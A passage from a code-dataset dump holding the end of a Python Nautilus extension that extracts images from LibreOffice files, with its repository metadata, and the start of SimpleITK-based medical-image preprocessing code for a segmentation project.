xoptions=Gtk.AttachOptions.SHRINK,\n                     yoptions=Gtk.AttachOptions.EXPAND)\n        button_stop = Gtk.Button()\n        button_stop.set_size_request(40, 40)\n        button_stop.set_image(\n            Gtk.Image.new_from_stock(Gtk.STOCK_STOP, Gtk.IconSize.BUTTON))\n        button_stop.connect('clicked', self.on_button_stop_clicked)\n        table.attach(button_stop, 1, 2, 1, 2,\n                     xpadding=5,\n                     ypadding=5,\n                     xoptions=Gtk.AttachOptions.SHRINK)\n        self.stop = False\n        self.show_all()\n        self.max_value = max_value\n        self.value = 0.0\n\n    def emit(self, *args):\n        GLib.idle_add(GObject.GObject.emit, self, *args)\n\n    def set_max_value(self, anobject, max_value):\n        self.max_value = float(max_value)\n\n    def get_stop(self):\n        return self.stop\n\n    def on_button_stop_clicked(self, widget):\n        self.stop = True\n        self.emit('i-want-stop')\n\n    def close(self, *args):\n        self.destroy()\n\n    def set_element(self, anobject, element):\n        self.label.set_text(_('Extracting images from %s') % element)\n\n    def increase(self, anobject, value):\n        self.value += float(value)\n        fraction = self.value / self.max_value\n        self.progressbar.set_fraction(fraction)\n        if self.value == self.max_value:\n            self.hide()\n\n\nclass DoItInBackground(GObject.GObject, Thread):\n    __gsignals__ = {\n        'started': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, (int,)),\n        'ended': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, (bool,)),\n        'start_one': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, (str,)),\n        'end_one': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE, (int,)),\n    }\n\n    def __init__(self, elements):\n        GObject.GObject.__init__(self)\n        Thread.__init__(self)\n        self.elements = elements\n        self.stopit = False\n        self.ok = True\n        self.daemon = True\n        self.process = None\n\n    def emit(self, *args):\n        GLib.idle_add(GObject.GObject.emit, self, *args)\n\n    def stop(self, *args):\n        self.stopit = True\n\n    def extract_images(self, file_in):\n        extract_images(file_in)\n\n    def run(self):\n        total = 0\n        for element in self.elements:\n            total += os.path.getsize(element)\n        self.emit('started', total)\n        try:\n            for element in self.elements:\n                print(element)\n                if self.stopit is True:\n                    self.ok = False\n                    break\n                self.emit('start_one', element)\n                self.extract_images(element)\n                self.emit('end_one', os.path.getsize(element))\n        except Exception as e:\n            self.ok = False\n            try:\n                if self.process is not None:\n                    self.process.terminate()\n                    self.process = None\n            except Exception as e:\n                print(e)\n        self.emit('ended', self.ok)\n\n\nclass ExtImagesODTFileMenuProvider(GObject.GObject, FileManager.MenuProvider):\n    \"\"\"\n    Implements the 'Extract images from LibreOffice files' extension to the File Manager\\\n    right-click menu\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"\n        File Manager crashes if a plugin doesn't 
implement the __init__\\\n        method\n        \"\"\"\n        mimetypes.init()\n        pass\n\n    def all_are_odt_files(self, items):\n        for item in items:\n            file_in = unquote_plus(item.get_uri()[7:])\n            if not os.path.isfile(file_in):\n                return False\n            mimetype = mimetypes.guess_type('file://' + file_in)[0]\n            if mimetype not in MIMETYPES:\n                return False\n        return True\n\n    def extractimages(self, menu, selected, window):\n        odtfiles = get_files(selected)\n        diib = DoItInBackground(odtfiles)\n        progreso = ProgressDialog(_('Extract images from LibreOffice files'),\n                                  window,\n                                  len(odtfiles))\n        diib.connect('started', progreso.set_max_value)\n        diib.connect('start_one', progreso.set_element)\n        diib.connect('end_one', progreso.increase)\n        diib.connect('ended', progreso.close)\n        progreso.connect('i-want-stop', diib.stop)\n        diib.start()\n        progreso.run()\n\n    def get_file_items(self, window, sel_items):\n        \"\"\"\n        Adds the 'Extract images from LibreOffice files' menu item to the File Manager\\\n        right-click menu, connects its 'activate' signal to the 'run'\\\n        method passing the selected Directory/File\n        \"\"\"\n        top_menuitem = FileManager.MenuItem(\n            name='ExtImagesODTFileMenuProvider::Gtk-extimaagesfodt-top',\n            label=_('Extract images from LibreOffice files') + '...',\n            tip=_('Tool to extract images from LibreOffice files'))\n        submenu = FileManager.Menu()\n        top_menuitem.set_submenu(submenu)\n\n        sub_menuitem_00 = FileManager.MenuItem(\n            name='ExtImagesODTFileMenuProvider::Gtk-extimaagesfodt-sub-00',\n            label=_('Extract images from LibreOffice files'),\n            tip=_('Tool to extract images from LibreOffice files'))\n        if self.all_are_odt_files(sel_items):\n            sub_menuitem_00.connect('activate',\n                                    self.extractimages,\n                                    sel_items,\n                                    window)\n        else:\n            sub_menuitem_00.set_property('sensitive', False)\n        submenu.append_item(sub_menuitem_00)\n\n        sub_menuitem_02 = FileManager.MenuItem(\n            name='ExtImagesODTFileMenuProvider::Gtk-extimaagesfodt-sub-02',\n            label=_('About'),\n            tip=_('About'))\n        sub_menuitem_02.connect('activate', self.about, window)\n        submenu.append_item(sub_menuitem_02)\n\n        return top_menuitem,\n\n    def about(self, widget, window):\n        ad = Gtk.AboutDialog(parent=window)\n        ad.set_name(APP)\n        ad.set_version(VERSION)\n        ad.set_copyright('Copyright (c) 2017\nLorenzo Carbonell')\n        ad.set_comments(APP)\n        ad.set_license('''\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation, either version 3 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with\nthis program. 
If not, see <http://www.gnu.org/licenses/>.\n''')\n        ad.set_website('http://www.atareao.es')\n        ad.set_website_label('http://www.atareao.es')\n        ad.set_authors([\n            'Lorenzo Carbonell '])\n        ad.set_documenters([\n            'Lorenzo Carbonell '])\n        ad.set_icon_name(APP)\n        ad.set_logo_icon_name(APP)\n        ad.run()\n        ad.destroy()\n\n\nif __name__ == '__main__':\n    files = ['/home/lorenzo/Escritorio/ODT samples/test1.odt',\n             '/home/lorenzo/Escritorio/ODT samples/test2.odt',\n             '/home/lorenzo/Escritorio/ODT samples/test3.odt',\n             '/home/lorenzo/Escritorio/ODT samples/test4.odt',\n             '/home/lorenzo/Escritorio/ODT samples/test5.odt']\n    # reduce_lo_file(orginalFile)\n    pd = ProgressDialog('Test', None, len(files))\n    diib = DoItInBackground(files)\n    diib.connect('started', pd.set_max_value)\n    diib.connect('start_one', pd.set_element)\n    diib.connect('end_one', pd.increase)\n    diib.connect('ended', pd.close)\n    pd.connect('i-want-stop', diib.stop)\n    diib.run()\n    #pd = ProgressDialog('Test', None, 5)\n    pd.run()\n", "repo_name": "atareao/nautilus-loextract", "sub_path": "src/nautilus-loextract.py", "file_name": "nautilus-loextract.py", "file_ext": "py", "file_size_in_byte": 11567, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "gi.require_version", "line_number": 3, "usage_type": "call"}, {"api_name": "gi.require_version", "line_number": 4, "usage_type": "call"}, {"api_name": "gi.require_version", "line_number": 5, "usage_type": "call"}, {"api_name": "gi.require_version", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "urllib.unquote_plus", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 62, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 63, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 65, "usage_type": "call"}, {"api_name": "mimetypes.guess_type", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.Dialog", "line_number": 78, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 78, "usage_type": "name"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 80, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 80, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 80, "usage_type": "attribute"}, {"api_name": 
"gi.repository.Gtk.Dialog.__init__", "line_number": 84, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Dialog", "line_number": 84, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 84, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.WindowPosition", "line_number": 85, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 85, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.VBox", "line_number": 90, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 90, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Frame", "line_number": 94, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 94, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Table", "line_number": 96, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 96, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Label", "line_number": 99, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 99, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.AttachOptions", "line_number": 103, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 103, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.AttachOptions", "line_number": 104, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 104, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.ProgressBar", "line_number": 106, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 106, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.AttachOptions", "line_number": 111, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 111, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.AttachOptions", "line_number": 112, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 112, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Button", "line_number": 113, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 113, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.Image.new_from_stock", "line_number": 116, "usage_type": "call"}, {"api_name": "gi.repository.Gtk.Image", "line_number": 116, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 116, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.STOCK_STOP", "line_number": 116, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.IconSize", "line_number": 116, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk.AttachOptions", "line_number": 121, "usage_type": "attribute"}, {"api_name": "gi.repository.Gtk", "line_number": 121, "usage_type": "name"}, {"api_name": "gi.repository.GLib.idle_add", "line_number": 128, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 128, "usage_type": "name"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 128, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 128, "usage_type": "name"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 154, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 154, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 154, "usage_type": "name"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 156, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 156, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 156, "usage_type": 
"attribute"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 157, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 157, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 157, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 158, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 158, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 158, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.SIGNAL_RUN_FIRST", "line_number": 159, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 159, "usage_type": "name"}, {"api_name": "gi.repository.GObject.TYPE_NONE", "line_number": 159, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.GObject.__init__", "line_number": 163, "usage_type": "call"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 163, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 163, "usage_type": "name"}, {"api_name": "threading.Thread.__init__", "line_number": 164, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 164, "usage_type": "name"}, {"api_name": "gi.repository.GLib.idle_add", "line_number": 172, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 172, "usage_type": "name"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 172, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 172, "usage_type": "name"}, {"api_name": "os.path.getsize", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject.GObject", "line_number": 205, "usage_type": "attribute"}, {"api_name": "gi.repository.GObject", "line_number": 205, "usage_type": "name"}, {"api_name": "gi.repository.Nautilus.MenuProvider", "line_number": 205, "usage_type": "attribute"}, {"api_name": "gi.repository.Nautilus", "line_number": 205, "usage_type": "name"}, {"api_name": "mimetypes.init", "line_number": 216, "usage_type": "call"}, {"api_name": "urllib.unquote_plus", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "mimetypes.guess_type", "line_number": 224, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus.MenuItem", "line_number": 249, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus", "line_number": 249, "usage_type": "name"}, {"api_name": "gi.repository.Nautilus.Menu", "line_number": 253, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus", "line_number": 253, "usage_type": "name"}, {"api_name": "gi.repository.Nautilus.MenuItem", "line_number": 256, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus", "line_number": 256, "usage_type": "name"}, {"api_name": "gi.repository.Nautilus.MenuItem", "line_number": 269, "usage_type": "call"}, {"api_name": "gi.repository.Nautilus", "line_number": 269, "usage_type": "name"}, {"api_name": "gi.repository.Gtk.AboutDialog", "line_number": 279, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 279, "usage_type": "name"}]} +{"seq_id": "34581872184", "text": 
"import json\nimport math\nimport os\nimport importlib\n\n\n# TODO make dynamic for load data\nfrom autoSeg.preprocessing.Transform import OtsuCrop, ResampleVxSpacing, ResampleVxSpacing_no_reference, N4BiasCorrection, Normalize, IntensityClipper\n\nimport SimpleITK as sitk\nfrom SimpleITK import N4BiasFieldCorrection, GetImageFromArray\nimport numpy as np\nfrom torchvision import transforms\nimport sys\n\n\nclass InitialPreprocessor(object):\n def __init__(self, INPUT_data_dir, config_file):\n self.INPUT_data_dir = INPUT_data_dir\n self.INTERMEDIATE_data_dir = os.path.join(sys.path[0], 'data', 'intermediate_data')\n self.PREPROCESSED_data_dir = os.path.join(sys.path[0], 'data', 'preprocessed_data')\n\n # Loading the json data from specified config file\n config_file = os.path.join(sys.path[0], 'autoSeg', 'config', config_file)\n with open(config_file, 'r') as config_json:\n config_json_data = json.load(config_json)\n self.config_file = config_json_data\n\n self.dataset_import = getattr(importlib.import_module('autoSeg.data_loading.{0:s}'.format(self.config_file['dataset'][0])), '{0:s}'.format(self.config_file['dataset'][1]))\n\n def run(self):\n # Getting settings from config file\n isotropic = self.config_file.get('isotropic')\n vx_spacing = self.config_file.get('vxspacing')\n spacingfactor = self.config_file.get('vxspacingfactor')\n\n # Load the inital base dataset and perform selected options\n print(' Loading initial dataset')\n dataset = self.load_data(self.INPUT_data_dir)\n\n dataset_origin_path = self.INTERMEDIATE_data_dir\n\n # Logging what transforms the intermediate dataset will have at the end\n dataset_state = {}\n dataset_state['biascorrection'] = self.config_file.get('biascorrection')\n dataset_state['resampling'] = self.config_file.get('resampling')\n dataset_state['isotropic'] = self.config_file.get('isotropic')\n dataset_state['vxspacing'] = self.config_file.get('vxspacing')\n\n # TODO zorgen dat croppen zonder resamplen kan\n # Check if there is a previous dataset\n print(' Checking for previously preprocessed datasets')\n json_check_path = os.path.join(self.INTERMEDIATE_data_dir, 'resampling.json')\n if os.path.isfile(json_check_path):\n # Below we define what to do when the intermediate dataset is already in a certain state\n # (e.g. 
biascorrection and no resampling)\n            if not self.get_previous_config('biascorrection') and self.get_previous_config('resampling'):\n                bc = self.config_file.get('biascorrection')\n                res = self.config_file.get('resampling')\n                if not bc and not res:\n                    dataset_origin_path = self.INPUT_data_dir\n                elif bc and not res:\n                    dataset_origin_path = self.INPUT_data_dir\n                elif not bc and res:\n                    if self.config_file.get('isotropic') == self.get_previous_config('isotropic') and \\\n                            self.config_file.get('vxspacing') == self.get_previous_config('vxspacing'):\n                        self.config_file['cropping'] = False\n                        self.config_file['resampling'] = False\n                    else:\n                        dataset_origin_path = self.INPUT_data_dir\n                elif bc and res:\n                    self.config_file['cropping'] = False\n                    self.config_file['resampling'] = False\n\n            elif self.get_previous_config('biascorrection') and not self.get_previous_config('resampling'):\n                bc = self.config_file.get('biascorrection')\n                res = self.config_file.get('resampling')\n                if not bc and not res:\n                    dataset_origin_path = self.INPUT_data_dir\n                elif bc and not res:\n                    self.config_file['biascorrection'] = False\n                elif not bc and res:\n                    dataset_origin_path = self.INPUT_data_dir\n                elif bc and res:\n                    self.config_file['biascorrection'] = False\n\n            elif self.get_previous_config('biascorrection') and self.get_previous_config('resampling'):\n                dataset_origin_path = self.INPUT_data_dir\n        else:\n            # In case no previous dataset exists we use the input dataset\n            dataset_origin_path = self.INPUT_data_dir\n\n        # If resampling is set to true in the config we perform resampling\n        if self.config_file.get('resampling'):\n            print(' Resampling of the dataset is needed')\n            # Load the dataset and perform resampling on the voxel spacing\n            ref_img, reference_center, dimension = self.__create_reference_domain(dataset,\n                                                                                  isotropic=isotropic,\n                                                                                  vx_spacing=vx_spacing,\n                                                                                  spacingfactor=spacingfactor)\n            print(' Dataset will be resampled to shape:', ref_img.GetSize(), 'and spacing:', vx_spacing,\n                  'with default value:', self.config_file.get('default_pixel_value'))\n            if not self.config_file.get('resample_without_reference'):\n                resample_obj = ResampleVxSpacing(ref_img, reference_center, dimension,\n                                                 default_pixel_value=self.config_file.get('default_pixel_value'))\n            else:\n                # Here, only isotropic spacing is possible\n                resample_obj = ResampleVxSpacing_no_reference(spacingfactor=spacingfactor, default_pixel_value=self.config_file.get('default_pixel_value'))\n        else:\n            resample_obj = None\n            self.config_file['cropping'] = False\n            self.config_file['resampling'] = False\n\n        transforms_list = self.get_transforms_list(resample_obj)\n        print(' Needed transformations are:', transforms_list)\n        # Here we cut the list of transformations in two to ensure that we do the bias correction and resampling first,\n        # save it in the intermediate_data folder and then use it for further transformations\n        if resample_obj in transforms_list:\n            i = transforms_list.index(resample_obj)\n            transforms_list1 = transforms_list[:i + 1]\n            transforms_list2 = transforms_list[i + 1:]\n\n            print(' Loading initial dataset for resampling')\n            dataset_transf1 = self.load_data(dataset_origin_path, transforms_list1)\n            print(' Saving resampled dataset:')\n            self.save(dataset_transf1, self.INTERMEDIATE_data_dir)\n\n            print(' Loading resampled dataset for further preprocessing')\n            dataset_transf = self.load_data(self.INTERMEDIATE_data_dir, transforms_list2)\n            print(' Saving fully preprocessed dataset:')\n            self.save(dataset_transf, self.PREPROCESSED_data_dir)\n        else:\n            # If there is no resampling needed we don't slice 
the list\n print(' Loading older resampled dataset for further preprocessing')\n dataset_transf = self.load_data(self.INTERMEDIATE_data_dir, transforms_list)\n print(' Saving fully preprocessed dataset:')\n self.save(dataset_transf, self.PREPROCESSED_data_dir)\n\n # Here we store the executed resampling steps in a file that we can check in later uses.\n json_check_path = os.path.join(self.INTERMEDIATE_data_dir, 'resampling.json')\n with open(json_check_path, 'w') as outfile: # Use file to refer to the file object\n json.dump(dataset_state, outfile)\n\n # check whether the dataset is valid and can be used in the training procedure. ssp stands for\n # sizes, spacing and pooling\n is_valid_dataset, ssp = self.dataset_valid(dataset_transf)\n if is_valid_dataset:\n print(' Dataset valid for training')\n else:\n raise ValueError('Dataset is not valid for training. Sizes, spacing and pooling are:', ssp)\n\n def load_data(self, data_dir, transforms_list: list = None):\n if transforms_list is None:\n transforms_list = []\n transform = transforms.Compose(transforms_list)\n # data_set = eval(self.config_file['dataset'][1])(root_dir=data_dir, transform=transform)\n data_set = self.dataset_import(root_dir=data_dir, transform=transform)\n\n return data_set\n\n def get_transforms_list(self, resampleObj=None):\n transforms_list = []\n # If config says we need to do a transformation, we add this to the list\n transf_options_dict = {\n \"biascorrection\": N4BiasCorrection(),\n \"cropping\": OtsuCrop(),\n \"resampling\": resampleObj,\n \"intensityclipping\": IntensityClipper(self.config_file.get('intensityclippingvalues')[0],\n self.config_file.get('intensityclippingvalues')[1]),\n \"normalization\": Normalize(norm_method=self.config_file.get('normalizationmethod'),\n lir=self.config_file.get('lirHir')[0],\n hir=self.config_file.get('lirHir')[1],\n masked=self.config_file.get('masked'))\n\n }\n\n for transf_option in transf_options_dict:\n if self.config_file.get('{}'.format(transf_option)):\n transforms_list.append(transf_options_dict.get(transf_option))\n\n return transforms_list\n\n def save(self, dataset, OUTPUT_data_dir):\n for subject in dataset:\n name_img = subject.get('name_img')\n name_seg = subject.get('name_seg')\n img = subject.get('image')\n seg = subject.get('segmentation')\n\n # create path to store the images. The path has the same folder structure as initial dataset\n file_struct_img = name_img.split('_data')[1].split(os.sep)[:-1]\n file_struct_seg = name_seg.split('_data')[1].split(os.sep)[:-1]\n\n\n folder_path_img = os.path.join(OUTPUT_data_dir, *file_struct_img)\n folder_path_seg = os.path.join(OUTPUT_data_dir, *file_struct_seg)\n\n # Check if the path already exists. 
If not, make the path\n        print(' Saving to: ', folder_path_img, 'and', folder_path_seg)\n        if not os.path.isdir(folder_path_img):\n            os.makedirs(folder_path_img)\n        if not os.path.isdir(folder_path_seg):\n            os.makedirs(folder_path_seg)\n        # check if images are already gzipped, if not do it anyway\n        save_img_name = name_img.split(os.path.sep)[-1] + '.gz' if not '.gz' in name_img.split(os.path.sep)[-1] else name_img.split(os.path.sep)[-1]\n        save_seg_name = name_seg.split(os.path.sep)[-1] + '.gz' if not '.gz' in name_seg.split(os.path.sep)[-1] else name_seg.split(os.path.sep)[-1]\n        img_file_path = os.path.join(folder_path_img, save_img_name)\n        seg_file_path = os.path.join(folder_path_seg, save_seg_name)\n        sitk.WriteImage(img, str(img_file_path))\n        sitk.WriteImage(seg, str(seg_file_path))\n\n    def get_previous_config(self, param: str):\n        prev_conf = False\n\n        # construct path to file\n        json_check_path = os.path.join(self.INTERMEDIATE_data_dir, 'resampling.json')\n\n        # File might not exist, in that case we use the exception\n        try:\n            with open(json_check_path, 'r') as infile: # Use file to refer to the file object\n                data = json.load(infile)\n                prev_conf = data.get(param)\n        except IOError:\n            pass\n        return prev_conf\n\n    def dataset_valid(self, dataset):\n        size_list = []\n        vx_spacing_list = []\n\n        for subject in dataset:\n            img = subject.get('image')\n\n            size_list.append(img.GetSize())\n            vx_spacing_list.append(img.GetSpacing())\n\n        # Since we do 4 max pooling operations with filtersize 2x2(x2) we need to get an amount of layers that is\n        # divisible by 2x2x2x2=16\n        same_sizes = size_list[:-1] == size_list[1:]\n        same_spacing = vx_spacing_list[:-1] == vx_spacing_list[1:]\n        # TODO get the pooling size from the training config file in order to determine if pooling is possible\n        max_pooling_possible = None\n\n        for (x, y, z) in size_list:\n            if x % 16 == 0 and y % 16 == 0 and z % 16 == 0:\n                max_pooling_possible = True\n            else:\n                max_pooling_possible = False\n                break\n        return same_sizes and same_spacing and max_pooling_possible, (same_sizes, same_spacing, max_pooling_possible)\n\n    def adjust_reference_size(self, reference_size):\n        adjusted_reference_size = []\n        for x in reference_size:\n            adjusted_reference_size.append(math.ceil(x / 16.0) * 16)\n        return adjusted_reference_size\n\n    def __create_reference_domain(self, dataset, isotropic: bool = True, vx_spacing: str = 'median',\n                                  spacingfactor: int = 1):\n        # In Lipo Data this will be 3D\n        dimension = dataset[0].get('image').GetDimension()\n\n        # Physical image size corresponds to the largest physical size in the training set, or any other arbitrary size.\n        reference_physical_size = np.zeros(dimension)\n        biggest_img_size = 0\n        spacing_list = []\n        sizes_list = []\n\n        for index, subject in enumerate(dataset):\n            img = subject.get('image')\n            reference_physical_size[:] = [(sz - 1) * spc if sz * spc > mx else mx for sz, spc, mx in\n                                          zip(img.GetSize(), img.GetSpacing(), reference_physical_size)]\n            biggest_img_size = max(img.GetSize()) if max(img.GetSize()) > biggest_img_size else biggest_img_size\n            spacing_list.append(img.GetSpacing())\n            sizes_list.append(img.GetSize())\n\n        # TODO sort by individual tuple values, not tuples as a whole\n        sizes_list.sort()\n        # print('sizelist:', sizes_list)\n        # print('spacing list:', spacing_list)\n        spacing_list.sort()\n        # print('spacing list ordered:', spacing_list)\n        # print('median spacing: ', spacing_list[int(len(spacing_list) / 2)])\n        # Create the reference image with a zero origin, identity direction cosine matrix and dimension\n        reference_origin 
= np.zeros(dimension)\n        reference_direction = np.identity(dimension).flatten()\n\n        # TODO change voxel spacing from smallest to mean\n        # TODO implement 'smart spacing' option that minimizes overall distance to all points\n        if isotropic:\n            # The first possibility is that you want isotropic pixels, if so you can specify the image size for one of\n            # the axes and the others are determined by this choice. Below we choose to set the x axis to the biggest\n            # image size and the spacing accordingly.\n            if vx_spacing == 'median':\n                reference_spacing = [(spacing_list[int(len(spacing_list) / 2)][0])*spacingfactor] * dimension\n            elif vx_spacing == 'mean':\n                reference_spacing = [list(map(lambda y: math.ceil(sum(y) / float(len(y))), zip(*spacing_list)))[0]] * dimension\n            elif vx_spacing == 'min':\n                reference_spacing = [spacing_list[0][0]*spacingfactor] * dimension\n            elif vx_spacing == 'max':\n                reference_spacing = [spacing_list[-1][0]*spacingfactor] * dimension\n            elif vx_spacing == 'one':\n                reference_spacing = [1*spacingfactor] * dimension\n            elif vx_spacing == 'development':\n                print('prev spc', spacing_list[-1][0])\n                multiplier = (1, 4, 4)\n                reference_spacing = tuple(i * j for i, j in zip(multiplier, spacing_list[-1]))\n                print('new spc', reference_spacing)\n            else:\n                # Just use the median spacing\n                reference_spacing = [spacing_list[int(len(spacing_list) / 2)][0]] * dimension\n            # print('ref spacing:', reference_spacing)\n            reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n                              zip(reference_physical_size, reference_spacing)]\n            reference_size = self.adjust_reference_size(reference_size)\n            # print(reference_size, reference_size_x)\n        else:\n            # Select arbitrary number of pixels per dimension, smallest size that yields desired results\n            # or the required size of a pretrained network (e.g. VGG-16 224x224), transfer learning. This will\n            # often result in non-isotropic pixel spacing. Here we have chosen to use the largest img size to\n            # prevent loss of valuable information. Using this will make the image anisotropic. 
The effect\n # will most likely be seen in the 3rd dimension / over the slices.\n if vx_spacing == 'median':\n reference_spacing = spacing_list[int(len(spacing_list) / 2)]\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n elif vx_spacing == 'mean':\n reference_spacing = list(map(lambda y: math.ceil(sum(y) / float(len(y))), zip(*spacing_list)))\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n elif vx_spacing == 'min':\n reference_spacing = spacing_list[0]\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n elif vx_spacing == 'max':\n reference_spacing = spacing_list[-1]\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n elif vx_spacing == 'development':\n print('prev spc', spacing_list[-1])\n multiplier = (4, 4, 1)\n reference_spacing = tuple(i * j for i, j in zip(multiplier, spacing_list[-1]))\n print('new spc', reference_spacing)\n\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n\n else:\n # Just use the median spacing\n reference_spacing = spacing_list[int(len(spacing_list) / 2)]\n reference_size = [int(phys_sz / (spc) + 1) for phys_sz, spc in\n zip(reference_physical_size, reference_spacing)]\n reference_size = self.adjust_reference_size(reference_size)\n\n print(' Reference spacing will be:', reference_spacing)\n print(' Reference size will be:', reference_size)\n\n reference_image = sitk.Image(reference_size, 